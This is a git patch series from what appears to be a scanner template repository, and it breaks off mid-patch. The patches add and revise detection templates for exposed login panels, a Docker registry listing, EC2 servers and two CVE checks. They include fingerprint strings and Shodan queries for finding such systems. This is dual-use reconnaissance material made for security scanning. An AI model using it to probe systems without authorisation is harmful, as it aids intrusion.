Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 20 Dec 2022 12:04:40 +0530 Subject: [PATCH 1373/1415] Update gpc-json.yaml --- miscellaneous/gpc-json.yaml | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/miscellaneous/gpc-json.yaml b/miscellaneous/gpc-json.yaml index 4979e87f0b..0a5fa0a1c7 100644 --- a/miscellaneous/gpc-json.yaml +++ b/miscellaneous/gpc-json.yaml @@ -1,11 +1,14 @@ id: gpc-json info: - name: gpc.json file + name: Global Privacy Control (GPC) File Disclosure author: MihhailSokolov severity: info - description: The website defines a Global Privacy Control policy. - tags: misc,generic + description: | + The website defines a Global Privacy Control policy. + metadata: + verified: "true" + tags: misc,generic,gpc requests: - method: GET @@ -18,14 +21,14 @@ requests: max-redirects: 2 matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - "gpc" + - type: status + status: + - 200 + - type: dsl dsl: - "len(body) <= 1024 && len(body) > 0" From eefd44ce54741505837414606bdc7a7d83ea8012 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 15:13:24 +0530 Subject: [PATCH 1374/1415] Update CVE-2022-0786.yaml --- cves/2022/CVE-2022-0786.yaml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/cves/2022/CVE-2022-0786.yaml b/cves/2022/CVE-2022-0786.yaml index 1844dee47a..9024b1d7f7 100644 --- a/cves/2022/CVE-2022-0786.yaml +++ b/cves/2022/CVE-2022-0786.yaml @@ -11,13 +11,10 @@ info: - https://wordpress.org/plugins/kivicare-clinic-management-system/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0786 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2022-0786 - cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,kivicare-clinic-management-system,unauth + tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,kivicare-clinic-management-system,unauth requests: - raw: @@ -33,4 +30,4 @@ requests: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "Doctor details")' - condition: and \ No newline at end of file + condition: and From a4351f818705721da275916f02e841477cd49f25 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 15:38:52 +0530 Subject: [PATCH 1375/1415] Create amazon-ec2-detect.yaml --- technologies/aws/amazon-ec2-detect.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 technologies/aws/amazon-ec2-detect.yaml diff --git a/technologies/aws/amazon-ec2-detect.yaml b/technologies/aws/amazon-ec2-detect.yaml new file mode 100644 index 0000000000..1fa0949efb --- /dev/null +++ b/technologies/aws/amazon-ec2-detect.yaml @@ -0,0 +1,21 @@ +id: amazon-ec2-detect + +info: + name: Amazon EC2 Server Detect + author: ritikchaddha + severity: info + metadata: + verified: true + shodan-query: "Server: EC2ws" + tags: tech,aws,ec2,amazon + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - "Server: EC2ws" From 278bf4de1c14760dd01336017531c26c8d0922ff Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 15:40:30 +0530 Subject: [PATCH 1376/1415] Delete amazon-ec2-detect.yaml --- technologies/aws/amazon-ec2-detect.yaml | 21 --------------------- 1 file changed, 21 deletions(-) delete mode 100644 technologies/aws/amazon-ec2-detect.yaml diff --git a/technologies/aws/amazon-ec2-detect.yaml b/technologies/aws/amazon-ec2-detect.yaml deleted file mode 100644 index 1fa0949efb..0000000000 --- a/technologies/aws/amazon-ec2-detect.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: amazon-ec2-detect - -info: - name: Amazon EC2 Server Detect - author: ritikchaddha - severity: info - metadata: - verified: true - shodan-query: "Server: EC2ws" - tags: tech,aws,ec2,amazon - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - part: header - words: - - "Server: EC2ws" From 54e4042cd54ed2dfc4363199a1f0a7651c93ca9d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 15:40:55 +0530 Subject: [PATCH 1377/1415] Create amazon-ec2-detect.yaml --- technologies/aws/amazon-ec2-detect.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 technologies/aws/amazon-ec2-detect.yaml diff --git a/technologies/aws/amazon-ec2-detect.yaml b/technologies/aws/amazon-ec2-detect.yaml new file mode 100644 index 0000000000..1fa0949efb --- /dev/null +++ b/technologies/aws/amazon-ec2-detect.yaml @@ -0,0 +1,21 @@ +id: amazon-ec2-detect + +info: + name: Amazon EC2 Server Detect + author: ritikchaddha + severity: info + metadata: + verified: true + shodan-query: "Server: EC2ws" + tags: tech,aws,ec2,amazon + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - "Server: EC2ws" From f991746ef317da5da6fb75a0154ac0cb48b2ec19 Mon Sep 17 00:00:00 2001 From: davtur19 Date: Tue, 20 Dec 2022 11:16:25 +0100 Subject: [PATCH 1378/1415] Add reference to docker-registry --- misconfiguration/docker-registry.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/misconfiguration/docker-registry.yaml b/misconfiguration/docker-registry.yaml index 595c423904..d960a53b2f 100644 --- a/misconfiguration/docker-registry.yaml +++ b/misconfiguration/docker-registry.yaml @@ -4,6 +4,8 @@ info: name: Docker Registry Listing author: puzzlepeaches severity: medium + reference: + - https://notsosecure.com/anatomy-of-a-hack-docker-registry tags: docker,devops requests: From 0aee3ac99492b93527f3f2b03cea4dbba7ba2dd6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 19:39:04 +0530 Subject: [PATCH 1379/1415] Update docker-registry.yaml --- misconfiguration/docker-registry.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/misconfiguration/docker-registry.yaml b/misconfiguration/docker-registry.yaml index d960a53b2f..11cbb32d62 100644 --- a/misconfiguration/docker-registry.yaml +++ b/misconfiguration/docker-registry.yaml @@ -6,20 +6,23 @@ info: severity: medium reference: - https://notsosecure.com/anatomy-of-a-hack-docker-registry - tags: docker,devops + tags: misconfig,docker,devops requests: - method: GET path: - "{{BaseURL}}/v2/_catalog" + host-redirects: true max-redirects: 1 matchers-condition: and matchers: - type: word + part: body words: - '"repositories":' + - type: word + part: header words: - "application/json" - part: header From b2967375cec1a75ee2a271b8643b29e75c801e3a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 20 Dec 2022 21:09:59 +0530 Subject: [PATCH 1380/1415] Update CVE-2022-25082.yaml --- cves/2022/CVE-2022-25082.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-25082.yaml b/cves/2022/CVE-2022-25082.yaml index e617718b45..4a22e910a9 100644 --- a/cves/2022/CVE-2022-25082.yaml +++ b/cves/2022/CVE-2022-25082.yaml @@ -36,11 +36,12 @@ requests: words: - ".sh" - ".cgi" + condition: and + - type: word part: header words: - 'application/octet-stream' - condition: and - type: status status: From 7ffaf6dada2c6dbfda47bdd060324ea8de34cedf Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Wed, 21 Dec 2022 00:46:26 +0530 Subject: [PATCH 1381/1415] Added template for webuzo-admin-panel --- exposed-panels/webuzo-admin-panel.yaml | 30 ++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 exposed-panels/webuzo-admin-panel.yaml diff --git a/exposed-panels/webuzo-admin-panel.yaml b/exposed-panels/webuzo-admin-panel.yaml new file mode 100644 index 0000000000..17602ba2a3 --- /dev/null +++ b/exposed-panels/webuzo-admin-panel.yaml @@ -0,0 +1,30 @@ +id: webuzo-admin-panel + +info: + name: Webuzo - Admin Panel + author: theamanrawat + severity: info + metadata: + verified: true + shodan-query: http.title:"Webuzo - Admin Panel" + tags: webuzo, login, panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Webuzo - Admin Panel' + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 85c372c286b73923aea6baf6cc02244a674f9721 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Wed, 21 Dec 2022 01:07:58 +0530 Subject: [PATCH 1382/1415] Added template for creatio-login-panel --- exposed-panels/creatio-login-panel.yaml | 28 +++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposed-panels/creatio-login-panel.yaml diff --git a/exposed-panels/creatio-login-panel.yaml b/exposed-panels/creatio-login-panel.yaml new file mode 100644 index 0000000000..2a18207286 --- /dev/null +++ b/exposed-panels/creatio-login-panel.yaml @@ -0,0 +1,28 @@ +id: creatio-login-panel + +info: + name: Creatio - login Panel + author: theamanrawat + severity: info + metadata: + verified: true + shodan-query: http.title:"Creatio" + tags: creatio,login,panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/Login/NuiLogin.aspx' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Creatio' + + - type: status + status: + - 200 \ No newline at end of file From e1a708108536e199e6274ddeef77176c86ff85b6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 21 Dec 2022 01:14:58 +0530 Subject: [PATCH 1383/1415] Update and rename creatio-login-panel.yaml to webuzo-admin-panel.yaml --- exposed-panels/creatio-login-panel.yaml | 28 ------------------------- exposed-panels/webuzo-admin-panel.yaml | 28 +++++++++++++++++++++++++ 2 files changed, 28 insertions(+), 28 deletions(-) delete mode 100644 exposed-panels/creatio-login-panel.yaml create mode 100644 exposed-panels/webuzo-admin-panel.yaml diff --git a/exposed-panels/creatio-login-panel.yaml b/exposed-panels/creatio-login-panel.yaml deleted file mode 100644 index 2a18207286..0000000000 --- a/exposed-panels/creatio-login-panel.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: creatio-login-panel - -info: - name: Creatio - login Panel - author: theamanrawat - severity: info - metadata: - verified: true - shodan-query: http.title:"Creatio" - tags: creatio,login,panel - -requests: - - method: GET - path: - - '{{BaseURL}}' - - '{{BaseURL}}/Login/NuiLogin.aspx' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Creatio' - - - type: status - status: - - 200 \ No newline at end of file diff --git a/exposed-panels/webuzo-admin-panel.yaml b/exposed-panels/webuzo-admin-panel.yaml new file mode 100644 index 0000000000..efb726979d --- /dev/null +++ b/exposed-panels/webuzo-admin-panel.yaml @@ -0,0 +1,28 @@ +id: webuzo-admin-panel + +info: + name: Webuzo Admin Panel + author: theamanrawat + severity: info + metadata: + verified: true + shodan-query: http.title:"Webuzo - Admin Panel" + tags: panel,webuzo,admin + +requests: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Webuzo - Admin Panel' + + - type: status + status: + - 200 From cfaff6a710fc07db09bf9e2b499d0618983b1fac Mon Sep 17 00:00:00 2001 From: Aman Rawat <35992750+theamanrawat@users.noreply.github.com> Date: Wed, 21 Dec 2022 01:17:31 +0530 Subject: [PATCH 1384/1415] Update and rename webuzo-admin-panel.yaml to creatio-login-panel.yaml --- ...admin-panel.yaml => creatio-login-panel.yaml} | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) rename exposed-panels/{webuzo-admin-panel.yaml => creatio-login-panel.yaml} (52%) diff --git a/exposed-panels/webuzo-admin-panel.yaml b/exposed-panels/creatio-login-panel.yaml similarity index 52% rename from exposed-panels/webuzo-admin-panel.yaml rename to exposed-panels/creatio-login-panel.yaml index efb726979d..1ad5f5574b 100644 --- a/exposed-panels/webuzo-admin-panel.yaml +++ b/exposed-panels/creatio-login-panel.yaml @@ -1,27 +1,27 @@ -id: webuzo-admin-panel +id: creatio-login-panel info: - name: Webuzo Admin Panel + name: Creatio - login Panel author: theamanrawat severity: info metadata: verified: true - shodan-query: http.title:"Webuzo - Admin Panel" - tags: panel,webuzo,admin + shodan-query: http.title:"Creatio" + tags: creatio,login,panel requests: - method: GET path: - - "{{BaseURL}}" + - '{{BaseURL}}' + - '{{BaseURL}}/Login/NuiLogin.aspx' - host-redirects: true - max-redirects: 2 + stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - - 'Webuzo - Admin Panel' + - 'Creatio' - type: status status: From 4ac26feb739b51c2f65ee55db69e9d9e3d067c2c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 21 Dec 2022 01:30:40 +0530 Subject: [PATCH 1385/1415] Update webuzo-admin-panel.yaml --- exposed-panels/webuzo-admin-panel.yaml | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/exposed-panels/webuzo-admin-panel.yaml b/exposed-panels/webuzo-admin-panel.yaml index 17602ba2a3..efb726979d 100644 --- a/exposed-panels/webuzo-admin-panel.yaml +++ b/exposed-panels/webuzo-admin-panel.yaml @@ -1,20 +1,19 @@ id: webuzo-admin-panel info: - name: Webuzo - Admin Panel + name: Webuzo Admin Panel author: theamanrawat severity: info metadata: verified: true shodan-query: http.title:"Webuzo - Admin Panel" - tags: webuzo, login, panel + tags: panel,webuzo,admin requests: - method: GET path: - - '{{BaseURL}}' + - "{{BaseURL}}" - stop-at-first-match: true host-redirects: true max-redirects: 2 matchers-condition: and @@ -22,9 +21,8 @@ requests: - type: word part: body words: - - 'Webuzo - Admin Panel' - condition: and + - 'Webuzo - Admin Panel' - type: status status: - - 200 \ No newline at end of file + - 200 From cd67105284aeca863595495a597b7140ce3feb00 Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Wed, 21 Dec 2022 01:51:10 +0530 Subject: [PATCH 1386/1415] Create posthog-admin-panel.yaml --- exposed-panels/posthog-admin-panel.yaml | 28 +++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposed-panels/posthog-admin-panel.yaml diff --git a/exposed-panels/posthog-admin-panel.yaml b/exposed-panels/posthog-admin-panel.yaml new file mode 100644 index 0000000000..937c7139a5 --- /dev/null +++ b/exposed-panels/posthog-admin-panel.yaml @@ -0,0 +1,28 @@ +id: posthog-admin-panel + +info: + name: posthog-admin-panel + author: theabhinavgaur + severity: info + tags: posthog-admin-panel + +requests: + - method: GET + path: + - "{{BaseURL}}/login?next=/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - POSTHOG_ + + - type: status + status: + - 200 + + - type: word + part: body + words: + - app.posthog.com From 439db51e14188e831e11132173656bbf1c5e347d Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Wed, 21 Dec 2022 01:54:11 +0530 Subject: [PATCH 1387/1415] Update posthog-admin-panel.yaml --- exposed-panels/posthog-admin-panel.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposed-panels/posthog-admin-panel.yaml b/exposed-panels/posthog-admin-panel.yaml index 937c7139a5..5e6f675ca4 100644 --- a/exposed-panels/posthog-admin-panel.yaml +++ b/exposed-panels/posthog-admin-panel.yaml @@ -4,6 +4,8 @@ info: name: posthog-admin-panel author: theabhinavgaur severity: info + metadata: http.title:"posthog" + shodan-query: http.title:"Oracle Access Management" tags: posthog-admin-panel requests: From cebefe6a906ab0ed55027df35e8e398b8fd4bcd2 Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Wed, 21 Dec 2022 01:54:57 +0530 Subject: [PATCH 1388/1415] Update posthog-admin-panel.yaml --- exposed-panels/posthog-admin-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/posthog-admin-panel.yaml b/exposed-panels/posthog-admin-panel.yaml index 5e6f675ca4..03bd6b5ee3 100644 --- a/exposed-panels/posthog-admin-panel.yaml +++ b/exposed-panels/posthog-admin-panel.yaml @@ -4,8 +4,8 @@ info: name: posthog-admin-panel author: theabhinavgaur severity: info - metadata: http.title:"posthog" - shodan-query: http.title:"Oracle Access Management" + metadata: + shodan-query: http.title:"posthog" tags: posthog-admin-panel requests: From 464481607732e8b968db80175e8f29981b2e68b5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Dec 2022 01:56:23 +0530 Subject: [PATCH 1389/1415] minor-update (#6399) --- cves/2022/CVE-2022-25082.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-25082.yaml b/cves/2022/CVE-2022-25082.yaml index 4a22e910a9..d0cd95fd1a 100644 --- a/cves/2022/CVE-2022-25082.yaml +++ b/cves/2022/CVE-2022-25082.yaml @@ -32,14 +32,14 @@ requests: matchers-condition: and matchers: - type: word - part: body + part: body_2 words: - ".sh" - ".cgi" condition: and - type: word - part: header + part: header_2 words: - 'application/octet-stream' From 69742b61baa4a6befa8a76d77729c0d0e313d79f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 21 Dec 2022 02:05:08 +0530 Subject: [PATCH 1390/1415] Update creatio-login-panel.yaml --- exposed-panels/creatio-login-panel.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/exposed-panels/creatio-login-panel.yaml b/exposed-panels/creatio-login-panel.yaml index 1ad5f5574b..a90d09f947 100644 --- a/exposed-panels/creatio-login-panel.yaml +++ b/exposed-panels/creatio-login-panel.yaml @@ -1,27 +1,28 @@ id: creatio-login-panel info: - name: Creatio - login Panel + name: Creatio Login Panel author: theamanrawat severity: info metadata: verified: true shodan-query: http.title:"Creatio" - tags: creatio,login,panel + tags: panel,creatio requests: - method: GET path: - - '{{BaseURL}}' - '{{BaseURL}}/Login/NuiLogin.aspx' - stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - - 'Creatio' + - '/creatio/widget' + - 'creatio-sdk/' + - 'Creatio Debug mode' + condition: or - type: status status: From 2bc400c208189fdddf52c754031010e85d34d048 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 21 Dec 2022 02:14:22 +0530 Subject: [PATCH 1391/1415] Update posthog-admin-panel.yaml --- exposed-panels/posthog-admin-panel.yaml | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/exposed-panels/posthog-admin-panel.yaml b/exposed-panels/posthog-admin-panel.yaml index 03bd6b5ee3..fcf9621c71 100644 --- a/exposed-panels/posthog-admin-panel.yaml +++ b/exposed-panels/posthog-admin-panel.yaml @@ -1,12 +1,13 @@ id: posthog-admin-panel info: - name: posthog-admin-panel + name: Posthog Admin Panel author: theabhinavgaur severity: info metadata: + verified: true shodan-query: http.title:"posthog" - tags: posthog-admin-panel + tags: panel,posthog requests: - method: GET @@ -18,13 +19,11 @@ requests: - type: word part: body words: - - POSTHOG_ + - 'PostHog' + - 'content="PostHog' + - 'POSTHOG_HOST' + condition: or - type: status status: - 200 - - - type: word - part: body - words: - - app.posthog.com From 7b408f0dc8fd9f3713cf86c692c48abaadd26749 Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Wed, 21 Dec 2022 13:02:01 +0530 Subject: [PATCH 1392/1415] Create Loxone-Login.yaml --- Loxone-Login.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 Loxone-Login.yaml diff --git a/Loxone-Login.yaml b/Loxone-Login.yaml new file mode 100644 index 0000000000..e1e15a04ab --- /dev/null +++ b/Loxone-Login.yaml @@ -0,0 +1,26 @@ +id: loxone-login + +info: + name: Loxone-Intercom-Video-Login + author: theabhinavgaur + severity: info + metadata: + verified: true + shodan-query: http.title:"Loxone Intercom Video" + tags: panel,Loxone + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - Loxone Intercom Video + + - type: status + status: + - 200 From d4e0fe700b27920d63357213ce4cb4ea353d7dcb Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Wed, 21 Dec 2022 13:05:13 +0530 Subject: [PATCH 1393/1415] Update Loxone-Login.yaml --- Loxone-Login.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Loxone-Login.yaml b/Loxone-Login.yaml index e1e15a04ab..3a5258cd38 100644 --- a/Loxone-Login.yaml +++ b/Loxone-Login.yaml @@ -4,9 +4,9 @@ info: name: Loxone-Intercom-Video-Login author: theabhinavgaur severity: info - metadata: - verified: true - shodan-query: http.title:"Loxone Intercom Video" + metadata: + verified: true + shodan-query: http.title:"Loxone Intercom Video" tags: panel,Loxone requests: From 1985de2f6bf9c6c1eff4ffe81326296544392216 Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Wed, 21 Dec 2022 13:08:55 +0530 Subject: [PATCH 1394/1415] Update Loxone-Login.yaml --- Loxone-Login.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/Loxone-Login.yaml b/Loxone-Login.yaml index 3a5258cd38..0532903c0b 100644 --- a/Loxone-Login.yaml +++ b/Loxone-Login.yaml @@ -4,8 +4,7 @@ info: name: Loxone-Intercom-Video-Login author: theabhinavgaur severity: info - metadata: - verified: true + metadata: shodan-query: http.title:"Loxone Intercom Video" tags: panel,Loxone From b31a4c0eb1d025e3d9f77ca68a1fa570231cc787 Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Wed, 21 Dec 2022 13:14:20 +0530 Subject: [PATCH 1395/1415] Update Loxone-Login.yaml --- Loxone-Login.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/Loxone-Login.yaml b/Loxone-Login.yaml index 0532903c0b..a384eca38b 100644 --- a/Loxone-Login.yaml +++ b/Loxone-Login.yaml @@ -4,8 +4,9 @@ info: name: Loxone-Intercom-Video-Login author: theabhinavgaur severity: info - metadata: - shodan-query: http.title:"Loxone Intercom Video" + metadata: + verified: true + shodan-query: http.title:"Loxone Intercom Video" tags: panel,Loxone requests: From 88281faf9f2d14f8f201231e86273565cafd99de Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 21 Dec 2022 08:01:50 +0000 Subject: [PATCH 1396/1415] Auto Generated New Template Addition List [Wed Dec 21 08:01:50 UTC 2022] :robot: --- .new-additions | 67 ++++++++------------------------------------------ 1 file changed, 10 insertions(+), 57 deletions(-) diff --git a/.new-additions b/.new-additions index 32f111c5f2..ef56fab368 100644 --- a/.new-additions +++ b/.new-additions @@ -1,57 +1,10 @@ -cves/2019/CVE-2019-6802.yaml -cves/2021/CVE-2021-20323.yaml -cves/2021/CVE-2021-24827.yaml -cves/2021/CVE-2021-25099.yaml -cves/2022/CVE-2022-0826.yaml -cves/2022/CVE-2022-0948.yaml -cves/2022/CVE-2022-1595.yaml -cves/2022/CVE-2022-2314.yaml -cves/2022/CVE-2022-4050.yaml -cves/2022/CVE-2022-45917.yaml -default-logins/apache/karaf-default-login.yaml -default-logins/lutron/lutron-default-login.yaml -exposed-panels/aircube-dashboard-panel.yaml -exposed-panels/gyra-master-admin.yaml -exposed-panels/ilias-panel.yaml -exposed-panels/mag-dashboard-panel.yaml -exposed-panels/microfocus-admin-server.yaml -exposed-panels/netris-dashboard-panel.yaml -exposed-panels/planet-estream-panel.yaml -exposed-panels/spark-panel.yaml -exposed-panels/verizon-router-panel.yaml -exposures/configs/config-json.yaml -exposures/configs/golangci-config.yaml -exposures/configs/stestr-config.yaml -exposures/configs/websheets-config.yaml -exposures/files/database-credentials.yaml -exposures/files/gradle-libs.yaml -exposures/files/kubernetes-etcd-keys.yaml -exposures/files/routes-ini.yaml -exposures/files/salesforce-credentials.yaml -exposures/files/svn-wc-db.yaml -exposures/logs/badarg-log.yaml -exposures/logs/firebase-debug-log.yaml -exposures/logs/npm-debug-log.yaml -exposures/logs/production-log.yaml -iot/homeworks-illumination.yaml -miscellaneous/sitemap-detect.yaml -misconfiguration/installer/easyscripts-installer.yaml -misconfiguration/installer/metaview-explorer-installer.yaml -misconfiguration/unauth-mautic-upgrade.yaml -misconfiguration/unauth-zwave-mqtt.yaml -misconfiguration/vernemq-status-page.yaml -network/detection/cisco-finger-detect.yaml -network/detection/finger-detect.yaml -network/detection/mysql-detect.yaml -network/detection/redis-detect.yaml -network/detection/rpcbind-portmapper-detect.yaml -takeovers/leadpages-takeover.yaml -technologies/apache/apache-karaf-panel.yaml -technologies/icecast-server-detect.yaml -technologies/mikrotik-httpproxy.yaml -technologies/pagespeed-detect.yaml -vulnerabilities/nps/nps-auth-bypass.yaml -vulnerabilities/qibocms-file-download.yaml -vulnerabilities/vmware/vmware-nsx-stream-rce.yaml -vulnerabilities/zend/zend-v1-xss.yaml -vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml +cves/2022/CVE-2022-0786.yaml +cves/2022/CVE-2022-25082.yaml +exposed-panels/creatio-login-panel.yaml +exposed-panels/posthog-admin-panel.yaml +exposed-panels/webuzo-admin-panel.yaml +exposed-panels/xfinity-panel.yaml +iot/carel-plantvisor-panel.yaml +iot/hue-personal-wireless-panel.yaml +network/exposed-dockerd.yaml +technologies/aws/amazon-ec2-detect.yaml From c11ca5fcadc26eae880de8c85a039f872f279270 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 21 Dec 2022 21:52:04 +0530 Subject: [PATCH 1397/1415] Update Loxone-Login.yaml --- Loxone-Login.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Loxone-Login.yaml b/Loxone-Login.yaml index a384eca38b..11b6e87815 100644 --- a/Loxone-Login.yaml +++ b/Loxone-Login.yaml @@ -1,7 +1,7 @@ -id: loxone-login +id: loxone-panel info: - name: Loxone-Intercom-Video-Login + name: Loxone Intercom Video Login author: theabhinavgaur severity: info metadata: @@ -19,7 +19,7 @@ requests: - type: word part: body words: - - Loxone Intercom Video + - "Loxone Intercom Video" - type: status status: From 11fdf5afd66003b461c6f7736f183b4d9ed66ffb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 21 Dec 2022 21:52:45 +0530 Subject: [PATCH 1398/1415] Update and rename Loxone-Login.yaml to exposed-panels/loxone-panel.yaml --- Loxone-Login.yaml => exposed-panels/loxone-panel.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename Loxone-Login.yaml => exposed-panels/loxone-panel.yaml (100%) diff --git a/Loxone-Login.yaml b/exposed-panels/loxone-panel.yaml similarity index 100% rename from Loxone-Login.yaml rename to exposed-panels/loxone-panel.yaml From c8147e12e90512b315ca49f8bce8c84a5aaeb7a8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 22 Dec 2022 00:03:10 +0530 Subject: [PATCH 1399/1415] Update loxone-panel.yaml --- exposed-panels/loxone-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/loxone-panel.yaml b/exposed-panels/loxone-panel.yaml index 11b6e87815..a9d5534c63 100644 --- a/exposed-panels/loxone-panel.yaml +++ b/exposed-panels/loxone-panel.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: http.title:"Loxone Intercom Video" - tags: panel,Loxone + tags: panel,loxone requests: - method: GET From d87d0392b9401dad66b8f5cf7c305767335a0fc2 Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Thu, 22 Dec 2022 01:58:39 +0530 Subject: [PATCH 1400/1415] Create Content-Central-Login.yaml --- exposed-panels/Content-Central-Login.yaml | 25 +++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/Content-Central-Login.yaml diff --git a/exposed-panels/Content-Central-Login.yaml b/exposed-panels/Content-Central-Login.yaml new file mode 100644 index 0000000000..15c349be0d --- /dev/null +++ b/exposed-panels/Content-Central-Login.yaml @@ -0,0 +1,25 @@ +id: Content-Central-Login + +info: + name: Content Central Login + author: theabhinavgaur + severity: info + tags: panel,Content Central + +requests: + - method: GET + path: + - "{{BaseURL}}/ContentCentral/login.aspx/" + - "{{BaseURL}}/login.aspx" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - Content Central Login + case-insensitive: true + + - type: status + status: + - 200 From fc88d461aff06d05258285920349f9dcfe5ceb0f Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Thu, 22 Dec 2022 02:02:24 +0530 Subject: [PATCH 1401/1415] Update Content-Central-Login.yaml --- exposed-panels/Content-Central-Login.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/exposed-panels/Content-Central-Login.yaml b/exposed-panels/Content-Central-Login.yaml index 15c349be0d..9ea7b85888 100644 --- a/exposed-panels/Content-Central-Login.yaml +++ 